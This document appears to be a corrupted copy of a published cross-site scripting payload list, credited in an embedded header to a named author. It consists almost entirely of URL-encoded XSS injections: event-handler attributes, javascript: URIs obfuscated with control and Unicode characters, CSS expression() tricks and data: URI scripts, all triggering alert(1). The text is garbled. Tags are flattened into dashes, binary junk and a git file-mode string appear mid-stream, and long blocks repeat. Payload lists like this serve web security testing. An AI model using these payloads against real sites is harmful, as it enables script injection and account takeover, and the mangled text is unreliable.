useWheel---style-onLoad-style-onLoad=%22javascript:javascript:alert(1)%22---style-onLoad---iframe-onReadyStateChange-iframe-onReadyStateChange=%22javascript:javascript:alert(1)%22---iframe-onReadyStateChange---body-onPageShow-body-onPageShow=%22javascript:javascript:alert(1)%22---body-onPageShow---style-onReadyStateChange-style-onReadyStateChange=%22javascript:javascript:alert(1)%22---style-onReadyStateChange---frameset-onFocus-frameset-onFocus=%22javascript:javascript:alert(1)%22---frameset-onFocus---applet-onError-applet-onError=%22javascript:javascript:alert(1)%22---applet-onError---marquee-onStart-marquee-onStart=%22javascript:javascript:alert(1)%22---marquee-onStart---script-onLoad-script-onLoad=%22javascript:javascript:alert(1)%22---script-onLoad---html-onMouseOver-html-onMouseOver=%22javascript:javascript:alert(1)%22---html-onMouseOver---html-onMouseEnter-html-onMouseEnter=%22javascript:parent.javascript:alert(1)%22---html-onMouseEnter---body-onBeforeUnload-body-onBeforeUnload=%22javascript:javascript:alert(1)%22---body-onBeforeUnload---html-onMouseDown-html-onMouseDown=%22javascript:javascript:alert(1)%22---html-onMouseDown---marquee-onScroll-marquee-onScroll=%22javascript:javascript:alert(1)%22---marquee-onScroll---xml-onPropertyChange-xml-onPropertyChange=%22javascript:javascript:alert(1)%22---xml-onPropertyChange---frameset-onBlur-frameset-onBlur=%22javascript:javascript:alert(1)%22---frameset-onBlur---applet-onReadyStateChange-applet-onReadyStateChange=%22javascript:javascript:alert(1)%22---applet-onReadyStateChange---svg-onUnload-svg-onUnload=%22javascript:javascript:alert(1)%22---svg-onUnload---html-onMouseOut-html-onMouseOut=%22javascript:javascript:alert(1)%22---html-onMouseOut---body-onMouseMove-body-onMouseMove=%22javascript:javascript:alert(1)%22---body-onMouseMove---body-onResize-body-onResize=%22javascript:javascript:alert(1)%22---body-onResize---object-onError-object-onError=%22javascript:javascript:alert(1)%22---object-onError---body-onPopState-body-onPopState=%22javascript:javascript:alert(1)%22---body-onPopState---html-onMouseMove-html-onMouseMove=%22javascript:javascript:alert(1)%22---html-onMouseMove---applet-onreadystatechange-applet-onreadystatechange=%22javascript:javascript:alert(1)%22---applet-onreadystatechange---body-onpagehide-body-onpagehide=%22javascript:javascript:alert(1)%22---body-onpagehide---svg-onunload-svg-onunload=%22javascript:javascript:alert(1)%22---svg-onunload---applet-onerror-applet-onerror=%22javascript:javascript:alert(1)%22---applet-onerror---body-onkeyup-body-onkeyup=%22javascript:javascript:alert(1)%22---body-onkeyup---body-onunload-body-onunload=%22javascript:javascript:alert(1)%22---body-onunload---iframe-onload-iframe-onload=%22javascript:javascript:alert(1)%22---iframe-onload---body-onload-body-onload=%22javascript:javascript:alert(1)%22---body-onload---html-onmouseover-html-onmouseover=%22javascript:javascript:alert(1)%22---html-onmouseover---object-onbeforeload-object-onbeforeload=%22javascript:javascript:alert(1)%22---object-onbeforeload---body-onbeforeunload-body-onbeforeunload=%22javascript:javascript:alert(1)%22---body-onbeforeunload---body-onfocus-body-onfocus=%22javascript:javascript:alert(1)%22---body-onfocus---body-onkeydown-body-onkeydown=%22javascript:javascript:alert(1)%22---body-onkeydown---iframe-onbeforeload-iframe-onbeforeload=%22javascript:javascript:alert(1)%22---iframe-onbeforeload---iframe-src-iframe-src=%22javascript:javascript:alert(1)%22---iframe-src---svg-onload-svg-onload=%22javascript:javascript:alert(1)%22---svg-onload---html-onmousemove-html-onmousemove=%22javascript:javascript:alert(1)%22---html-onmousemove---body-onblur-body-onblur=%22javascript:javascript:alert(1)%22---body-onblur--%5Cx3Cscript-javascript:alert(1)--script--'%22%60--script---%5Cx2Fjavascript:alert(1)------script---script-javascript:alert(1)--script%5Cx0D--script-javascript:alert(1)--script%5Cx0A--script-javascript:alert(1)--script%5Cx0B--script-charset=%22%5Cx22-javascript:alert(1)--script---!--%5Cx3E-img-src=xxx:x-onerror=javascript:alert(1)----------!---------img-src=xxx:x-onerror=javascript:alert(1)----------!-----%5Cx00---img-src=xxx:x-onerror=javascript:alert(1)----------!-----%5Cx21---img-src=xxx:x-onerror=javascript:alert(1)----------!-----%5Cx3E---img-src=xxx:x-onerror=javascript:alert(1)------%60%22'--img-src='%23%5Cx27-onerror=javascript:alert(1)---a-href=%22javascript%5Cx3Ajavascript:alert(1)%22-id=%22fuzzelement1%22-test--a--%22'%60--p--svg--script-a='hello%5Cx27;javascript:alert(1)--';--script---p---a-href=%22javas%5Cx00cript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22javas%5Cx07cript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22javas%5Cx0Dcript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22javas%5Cx0Acript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22javas%5Cx08cript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22javas%5Cx02cript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22javas%5Cx03cript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22javas%5Cx04cript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22javas%5Cx01cript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22javas%5Cx05cript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22javas%5Cx0Bcript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22javas%5Cx09cript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22javas%5Cx06cript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22javas%5Cx0Ccript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---script---%5Cx2A-javascript:alert(1)------script---script---%5Cx00-javascript:alert(1)------script---style---style%5Cx3E-img-src=%22about:blank%22-onerror=javascript:alert(1)-----style---style---style%5Cx0D-img-src=%22about:blank%22-onerror=javascript:alert(1)-----style---style---style%5Cx09-img-src=%22about:blank%22-onerror=javascript:alert(1)-----style---style---style%5Cx20-img-src=%22about:blank%22-onerror=javascript:alert(1)-----style---style---style%5Cx0A-img-src=%22about:blank%22-onerror=javascript:alert(1)-----style--%22'%60-ABC-div-style=%22font-family:'foo'%5Cx7Dx:expression(javascript:alert(1);-';%22-DEF--%22'%60-ABC-div-style=%22font-family:'foo'%5Cx3Bx:expression(javascript:alert(1);-';%22-DEF---script-if(%22x%5C%5CxE1%5Cx96%5Cx89%22.length==2)-%7B-javascript:alert(1);%7D--script---script-if(%22x%5C%5CxE0%5CxB9%5Cx92%22.length==2)-%7B-javascript:alert(1);%7D--script---script-if(%22x%5C%5CxEE%5CxA9%5Cx93%22.length==2)-%7B-javascript:alert(1);%7D--script--'%60%22--%5Cx3Cscript-javascript:alert(1)--script--'%60%22--%5Cx00script-javascript:alert(1)--script--%22'%60--%5Cx3Cimg-src=xxx:x-onerror=javascript:alert(1)--%22'%60--%5Cx00img-src=xxx:x-onerror=javascript:alert(1)---script-src=%22data:text-plain%5Cx2Cjavascript:alert(1)%22---script---script-src=%22data:%5CxD4%5Cx8F,javascript:alert(1)%22---script---script-src=%22data:%5CxE0%5CxA4%5Cx98,javascript:alert(1)%22---script---script-src=%22data:%5CxCB%5Cx8F,javascript:alert(1)%22---script---script%5Cx20type=%22text-javascript%22-javascript:alert(1);--script---script%5Cx3Etype=%22text-javascript%22-javascript:alert(1);--script---script%5Cx0Dtype=%22text-javascript%22-javascript:alert(1);--script---script%5Cx09type=%22text-javascript%22-javascript:alert(1);--script---script%5Cx0Ctype=%22text-javascript%22-javascript:alert(1);--script---script%5Cx2Ftype=%22text-javascript%22-javascript:alert(1);--script---script%5Cx0Atype=%22text-javascript%22-javascript:alert(1);--script--ABC-div-style=%22x%5Cx3Aexpression(javascript:alert(1)%22-DEF-ABC-div-style=%22x:expression%5Cx5C(javascript:alert(1)%22-DEF-ABC-div-style=%22x:expression%5Cx00(javascript:alert(1)%22-DEF-ABC-div-style=%22x:exp%5Cx00ression(javascript:alert(1)%22-DEF-ABC-div-style=%22x:exp%5Cx5Cression(javascript:alert(1)%22-DEF-ABC-div-style=%22x:%5Cx0Aexpression(javascript:alert(1)%22-DEF-ABC-div-style=%22x:%5Cx09expression(javascript:alert(1)%22-DEF-ABC-div-style=%22x:%5CxE3%5Cx80%5Cx80expression(javascript:alert(1)%22-DEF-ABC-div-style=%22x:%5CxE2%5Cx80%5Cx84expression(javascript:alert(1)%22-DEF-ABC-div-style=%22x:%5CxC2%5CxA0expression(javascript:alert(1)%22-DEF-ABC-div-style=%22x:%5CxE2%5Cx80%5Cx80expression(javascript:alert(1)%22-DEF-ABC-div-style=%22x:%5CxE2%5Cx80%5Cx8Aexpression(javascript:alert(1)%22-DEF-ABC-div-style=%22x:%5Cx0Dexpression(javascript:alert(1)%22-DEF-ABC-div-style=%22x:%5Cx0Cexpression(javascript:alert(1)%22-DEF-ABC-div-style=%22x:%5CxE2%5Cx80%5Cx87expression(javascript:alert(1)%22-DEF-ABC-div-style=%22x:%5CxEF%5CxBB%5CxBFexpression(javascript:alert(1)%22-DEF-ABC-div-style=%22x:%5Cx20expression(javascript:alert(1)%22-DEF-ABC-div-style=%22x:%5CxE2%5Cx80%5Cx88expression(javascript:alert(1)%22-DEF-ABC-div-style=%22x:%5Cx00expression(javascript:alert(1)%22-DEF-ABC-div-style=%22x:%5CxE2%5Cx80%5Cx8Bexpression(javascript:alert(1)%22-DEF-ABC-div-style=%22x:%5CxE2%5Cx80%5Cx86expression(javascript:alert(1)%22-DEF-ABC-div-style=%22x:%5CxE2%5Cx80%5Cx85expression(javascript:alert(1)%22-DEF-ABC-div-style=%22x:%5CxE2%5Cx80%5Cx82expression(javascript:alert(1)%22-DEF-ABC-div-style=%22x:%5Cx0Bexpression(javascript:alert(1)%22-DEF-ABC-div-style=%22x:%5CxE2%5Cx80%5Cx81expression(javascript:alert(1)%22-DEF-ABC-div-style=%22x:%5CxE2%5Cx80%5Cx83expression(javascript:alert(1)%22-DEF-ABC-div-style=%22x:%5CxE2%5Cx80%5Cx89expression(javascript:alert(1)%22-DEF--a-href=%22%5Cx0Bjavascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5Cx0Fjavascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5CxC2%5CxA0javascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5Cx05javascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5CxE1%5CxA0%5Cx8Ejavascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5Cx18javascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5Cx11javascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5CxE2%5Cx80%5Cx88javascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5CxE2%5Cx80%5Cx89javascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5CxE2%5Cx80%5Cx80javascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5Cx17javascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5Cx03javascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5Cx0Ejavascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5Cx1Ajavascript:javascript:alert(1)%22-id=%22fuzzelement1%22DC%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BDf%12%EF%BF%BD%EF%BF%BD%13%EF%BF%BD&-%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD100644--!---Project-Name--:-Cross-Site-Scripting-(-XSS-)-Vulnerability-Payload-List------!----------Author-:-Ismail-Tasdelen------!--------Linkedin-:-https:--www.linkedin.com-in-ismailtasdelen-------!----------GitHub-:-https:--github.com-ismailtasdelen-------!---------Twitter-:-https:--twitter.com-ismailtsdln------!----------Medium-:-https:--medium.com-@ismailtasdelen-------script%5Cx20type=%22text-javascript%22-javascript:alert(1);--script---script%5Cx3Etype=%22text-javascript%22-javascript:alert(1);--script---script%5Cx0Dtype=%22text-javascript%22-javascript:alert(1);--script---script%5Cx09type=%22text-javascript%22-javascript:alert(1);--script---script%5Cx0Ctype=%22text-javascript%22-javascript:alert(1);--script---script%5Cx2Ftype=%22text-javascript%22-javascript:alert(1);--script---script%5Cx0Atype=%22text-javascript%22-javascript:alert(1);--script--'%60%22--%5Cx3Cscript-javascript:alert(1)--script----------'%60%22--%5Cx00script-javascript:alert(1)--script---img-src=1-href=1-onerror=%22javascript:alert(1)%22---img---audio-src=1-href=1-onerror=%22javascript:alert(1)%22---audio---video-src=1-href=1-onerror=%22javascript:alert(1)%22---video---body-src=1-href=1-onerror=%22javascript:alert(1)%22---body---image-src=1-href=1-onerror=%22javascript:alert(1)%22---image---object-src=1-href=1-onerror=%22javascript:alert(1)%22---object---script-src=1-href=1-onerror=%22javascript:alert(1)%22---script---svg-onResize-svg-onResize=%22javascript:javascript:alert(1)%22---svg-onResize---title-onPropertyChange-title-onPropertyChange=%22javascript:javascript:alert(1)%22---title-onPropertyChange---iframe-onLoad-iframe-onLoad=%22javascript:javascript:alert(1)%22---iframe-onLoad---body-onMouseEnter-body-onMouseEnter=%22javascript:javascript:alert(1)%22---body-onMouseEnter---body-onFocus-body-onFocus=%22javascript:javascript:alert(1)%22---body-onFocus---frameset-onScroll-frameset-onScroll=%22javascript:javascript:alert(1)%22---frameset-onScroll---script-onReadyStateChange-script-onReadyStateChange=%22javascript:javascript:alert(1)%22---script-onReadyStateChange---html-onMouseUp-html-onMouseUp=%22javascript:javascript:alert(1)%22---html-onMouseUp---body-onPropertyChange-body-onPropertyChange=%22javascript:javascript:alert(1)%22---body-onPropertyChange---svg-onLoad-svg-onLoad=%22javascript:javascript:alert(1)%22---svg-onLoad---body-onPageHide-body-onPageHide=%22javascript:javascript:alert(1)%22---body-onPageHide---body-onMouseOver-body-onMouseOver=%22javascript:javascript:alert(1)%22---body-onMouseOver---body-onUnload-body-onUnload=%22javascript:javascript:alert(1)%22---body-onUnload---body-onLoad-body-onLoad=%22javascript:javascript:alert(1)%22---body-onLoad---bgsound-onPropertyChange-bgsound-onPropertyChange=%22javascript:javascript:alert(1)%22---bgsound-onPropertyChange---html-onMouseLeave-html-onMouseLeave=%22javascript:javascript:alert(1)%22---html-onMouseLeave---html-onMouseWheel-html-onMouseWheel=%22javascript:javascript:alert(1)%22---html-onMouseWheel---style-onLoad-style-onLoad=%22javascript:javascript:alert(1)%22---style-onLoad---iframe-onReadyStateChange-iframe-onReadyStateChange=%22javascript:javascript:alert(1)%22---iframe-onReadyStateChange---body-onPageShow-body-onPageShow=%22javascript:javascript:alert(1)%22---body-onPageShow---style-onReadyStateChange-style-onReadyStateChange=%22javascript:javascript:alert(1)%22---style-onReadyStateChange---frameset-onFocus-frameset-onFocus=%22javascript:javascript:alert(1)%22---frameset-onFocus---applet-onError-applet-onError=%22javascript:javascript:alert(1)%22---applet-onError---marquee-onStart-marquee-onStart=%22javascript:javascript:alert(1)%22---marquee-onStart---script-onLoad-script-onLoad=%22javascript:javascript:alert(1)%22---script-onLoad---html-onMouseOver-html-onMouseOver=%22javascript:javascript:alert(1)%22---html-onMouseOver---html-onMouseEnter-html-onMouseEnter=%22javascript:parent.javascript:alert(1)%22---html-onMouseEnter---body-onBeforeUnload-body-onBeforeUnload=%22javascript:javascript:alert(1)%22---body-onBeforeUnload---html-onMouseDown-html-onMouseDown=%22javascript:javascript:alert(1)%22---html-onMouseDown---marquee-onScroll-marquee-onScroll=%22javascript:javascript:alert(1)%22---marquee-onScroll---xml-onPropertyChange-xml-onPropertyChange=%22javascript:javascript:alert(1)%22---xml-onPropertyChange---frameset-onBlur-frameset-onBlur=%22javascript:javascript:alert(1)%22---frameset-onBlur---applet-onReadyStateChange-applet-onReadyStateChange=%22javascript:javascript:alert(1)%22---applet-onReadyStateChange---svg-onUnload-svg-onUnload=%22javascript:javascript:alert(1)%22---svg-onUnload---html-onMouseOut-html-onMouseOut=%22javascript:javascript:alert(1)%22---html-onMouseOut---body-onMouseMove-body-onMouseMove=%22javascript:javascript:alert(1)%22---body-onMouseMove---body-onResize-body-onResize=%22javascript:javascript:alert(1)%22---body-onResize---object-onError-object-onError=%22javascript:javascript:alert(1)%22---object-onError---body-onPopState-body-onPopState=%22javascript:javascript:alert(1)%22---body-onPopState---html-onMouseMove-html-onMouseMove=%22javascript:javascript:alert(1)%22---html-onMouseMove---applet-onreadystatechange-applet-onreadystatechange=%22javascript:javascript:alert(1)%22---applet-onreadystatechange---body-onpagehide-body-onpagehide=%22javascript:javascript:alert(1)%22---body-onpagehide---svg-onunload-svg-onunload=%22javascript:javascript:alert(1)%22---svg-onunload---applet-onerror-applet-onerror=%22javascript:javascript:alert(1)%22---applet-onerror---body-onkeyup-body-onkeyup=%22javascript:javascript:alert(1)%22---body-onkeyup---body-onunload-body-onunload=%22javascript:javascript:alert(1)%22---body-onunload---iframe-onload-iframe-onload=%22javascript:javascript:alert(1)%22---iframe-onload---body-onload-body-onload=%22javascript:javascript:alert(1)%22---body-onload---html-onmouseover-html-onmouseover=%22javascript:javascript:alert(1)%22---html-onmouseover---object-onbeforeload-object-onbeforeload=%22javascript:javascript:alert(1)%22---object-onbeforeload---body-onbeforeunload-body-onbeforeunload=%22javascript:javascript:alert(1)%22---body-onbeforeunload---body-onfocus-body-onfocus=%22javascript:javascript:alert(1)%22---body-onfocus---body-onkeydown-body-onkeydown=%22javascript:javascript:alert(1)%22---body-onkeydown---iframe-onbeforeload-iframe-onbeforeload=%22javascript:javascript:alert(1)%22---iframe-onbeforeload---iframe-src-iframe-src=%22javascript:javascript:alert(1)%22---iframe-src---svg-onload-svg-onload=%22javascript:javascript:alert(1)%22---svg-onload---html-onmousemove-html-onmousemove=%22javascript:javascript:alert(1)%22---html-onmousemove---body-onblur-body-onblur=%22javascript:javascript:alert(1)%22---body-onblur--%5Cx3Cscript-javascript:alert(1)--script--'%22%60--script---%5Cx2Fjavascript:alert(1)------script---script-javascript:alert(1)--script%5Cx0D--script-javascript:alert(1)--script%5Cx0A--script-javascript:alert(1)--script%5Cx0B--script-charset=%22%5Cx22-javascript:alert(1)--script---!--%5Cx3E-img-src=xxx:x-onerror=javascript:alert(1)----------!---------img-src=xxx:x-onerror=javascript:alert(1)----------!-----%5Cx00---img-src=xxx:x-onerror=javascript:alert(1)----------!-----%5Cx21---img-src=xxx:x-onerror=javascript:alert(1)----------!-----%5Cx3E---img-src=xxx:x-onerror=javascript:alert(1)------%60%22'--img-src='%23%5Cx27-onerror=javascript:alert(1)---a-href=%22javascript%5Cx3Ajavascript:alert(1)%22-id=%22fuzzelement1%22-test--a--%22'%60--p--svg--script-a='hello%5Cx27;javascript:alert(1)--';--script---p---a-href=%22javas%5Cx00cript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22javas%5Cx07cript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22javas%5Cx0Dcript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22javas%5Cx0Acript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22javas%5Cx08cript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22javas%5Cx02cript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22javas%5Cx03cript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22javas%5Cx04cript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22javas%5Cx01cript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22javas%5Cx05cript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22javas%5Cx0Bcript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22javas%5Cx09cript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22javas%5Cx06cript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22javas%5Cx0Ccript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---script---%5Cx2A-javascript:alert(1)------script---script---%5Cx00-javascript:alert(1)------script---style---style%5Cx3E-img-src=%22about:blank%22-onerror=javascript:alert(1)-----style---style---style%5Cx0D-img-src=%22about:blank%22-onerror=javascript:alert(1)-----style---style---style%5Cx09-img-src=%22about:blank%22-onerror=javascript:alert(1)-----style---style---style%5Cx20-img-src=%22about:blank%22-onerror=javascript:alert(1)-----style---style---style%5Cx0A-img-src=%22about:blank%22-onerror=javascript:alert(1)-----style--%22'%60-ABC-div-style=%22font-family:'foo'%5Cx7Dx:expression(javascript:alert(1);-';%22-DEF--%22'%60-ABC-div-style=%22font-family:'foo'%5Cx3Bx:expression(javascript:alert(1);-';%22-DEF---script-if(%22x%5C%5CxE1%5Cx96%5Cx89%22.length==2)-%7B-javascript:alert(1);%7D--script---script-if(%22x%5C%5CxE0%5CxB9%5Cx92%22.length==2)-%7B-javascript:alert(1);%7D--script---script-if(%22x%5C%5CxEE%5CxA9%5Cx93%22.length==2)-%7B-javascript:alert(1);%7D--script--'%60%22--%5Cx3Cscript-javascript:alert(1)--script--'%60%22--%5Cx00script-javascript:alert(1)--script--%22'%60--%5Cx3Cimg-src=xxx:x-onerror=javascript:alert(1)--%22'%60--%5Cx00img-src=xxx:x-onerror=javascript:alert(1)---script-src=%22data:text-plain%5Cx2Cjavascript:alert(1)%22---script---script-src=%22data:%5CxD4%5Cx8F,javascript:alert(1)%22---script---script-src=%22data:%5CxE0%5CxA4%5Cx98,javascript:alert(1)%22---script---script-src=%22data:%5CxCB%5Cx8F,javascript:alert(1)%22---script---script%5Cx20type=%22text-javascript%22-javascript:alert(1);--script---script%5Cx3Etype=%22text-javascript%22-javascript:alert(1);--script---script%5Cx0Dtype=%22text-javascript%22-javascript:alert(1);--script---script%5Cx09type=%22text-javascript%22-javascript:alert(1);--script---script%5Cx0Ctype=%22text-javascript%22-javascript:alert(1);--script---script%5Cx2Ftype=%22text-javascript%22-javascript:alert(1);--script---script%5Cx0Atype=%22text-javascript%22-javascript:alert(1);--script--ABC-div-style=%22x%5Cx3Aexpression(javascript:alert(1)%22-DEF-ABC-div-style=%22x:expression%5Cx5C(javascript:alert(1)%22-DEF-ABC-div-style=%22x:expression%5Cx00(javascript:alert(1)%22-DEF-ABC-div-style=%22x:exp%5Cx00ression(javascript:alert(1)%22-DEF-ABC-div-style=%22x:exp%5Cx5Cression(javascript:alert(1)%22-DEF-ABC-div-style=%22x:%5Cx0Aexpression(javascript:alert(1)%22-DEF-ABC-div-style=%22x:%5Cx09expression(javascript:alert(1)%22-DEF-ABC-div-style=%22x:%5CxE3%5Cx80%5Cx80expression(javascript:alert(1)%22-DEF-ABC-div-style=%22x:%5CxE2%5Cx80%5Cx84expression(javascript:alert(1)%22-DEF-ABC-div-style=%22x:%5CxC2%5CxA0expression(javascript:alert(1)%22-DEF-ABC-div-style=%22x:%5CxE2%5Cx80%5Cx80expression(javascript:alert(1)%22-DEF-ABC-div-style=%22x:%5CxE2%5Cx80%5Cx8Aexpression(javascript:alert(1)%22-DEF-ABC-div-style=%22x:%5Cx0Dexpression(javascript:alert(1)%22-DEF-ABC-div-style=%22x:%5Cx0Cexpression(javascript:alert(1)%22-DEF-ABC-div-style=%22x:%5CxE2%5Cx80%5Cx87expression(javascript:alert(1)%22-DEF-ABC-div-style=%22x:%5CxEF%5CxBB%5CxBFexpression(javascript:alert(1)%22-DEF-ABC-div-style=%22x:%5Cx20expression(javascript:alert(1)%22-DEF-ABC-div-style=%22x:%5CxE2%5Cx80%5Cx88expression(javascript:alert(1)%22-DEF-ABC-div-style=%22x:%5Cx00expression(javascript:alert(1)%22-DEF-ABC-div-style=%22x:%5CxE2%5Cx80%5Cx8Bexpression(javascript:alert(1)%22-DEF-ABC-div-style=%22x:%5CxE2%5Cx80%5Cx86expression(javascript:alert(1)%22-DEF-ABC-div-style=%22x:%5CxE2%5Cx80%5Cx85expression(javascript:alert(1)%22-DEF-ABC-div-style=%22x:%5CxE2%5Cx80%5Cx82expression(javascript:alert(1)%22-DEF-ABC-div-style=%22x:%5Cx0Bexpression(javascript:alert(1)%22-DEF-ABC-div-style=%22x:%5CxE2%5Cx80%5Cx81expression(javascript:alert(1)%22-DEF-ABC-div-style=%22x:%5CxE2%5Cx80%5Cx83expression(javascript:alert(1)%22-DEF-ABC-div-style=%22x:%5CxE2%5Cx80%5Cx89expression(javascript:alert(1)%22-DEF--a-href=%22%5Cx0Bjavascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5Cx0Fjavascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5CxC2%5CxA0javascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5Cx05javascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5CxE1%5CxA0%5Cx8Ejavascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5Cx18javascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5Cx11javascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5CxE2%5Cx80%5Cx88javascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5CxE2%5Cx80%5Cx89javascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5CxE2%5Cx80%5Cx80javascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5Cx17javascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5Cx03javascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5Cx0Ejavascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5Cx1Ajavascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5Cx00javascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5Cx10javascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5CxE2%5Cx80%5Cx82javascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5Cx20javascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5Cx13javascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5Cx09javascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5CxE2%5Cx80%5Cx8Ajavascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5Cx14javascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5Cx19javascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5CxE2%5Cx80%5CxAFjavascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5Cx1Fjavascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5CxE2%5Cx80%5Cx81javascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5Cx1Djavascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5CxE2%5Cx80%5Cx87javascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5Cx07javascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5CxE1%5Cx9A%5Cx80javascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5CxE2%5Cx80%5Cx83javascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5Cx04javascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5Cx01javascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5Cx08javascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5CxE2%5Cx80%5Cx84javascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5CxE2%5Cx80%5Cx86javascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5CxE3%5Cx80%5Cx80javascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5Cx12javascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5Cx0Djavascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5Cx0Ajavascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5Cx0Cjavascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5Cx15javascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5CxE2%5Cx80%5CxA8javascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5Cx16javascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5Cx02javascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5Cx1Bjavascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5Cx06javascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5CxE2%5Cx80%5CxA9javascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5CxE2%5Cx80%5Cx85javascript:javascript:alert(1)%22-id=%22fuzzelement1%22-test--a---a-href=%22%5Cx1Ejavascript:javascript:alert(1)%22-id=%22fuzzelement1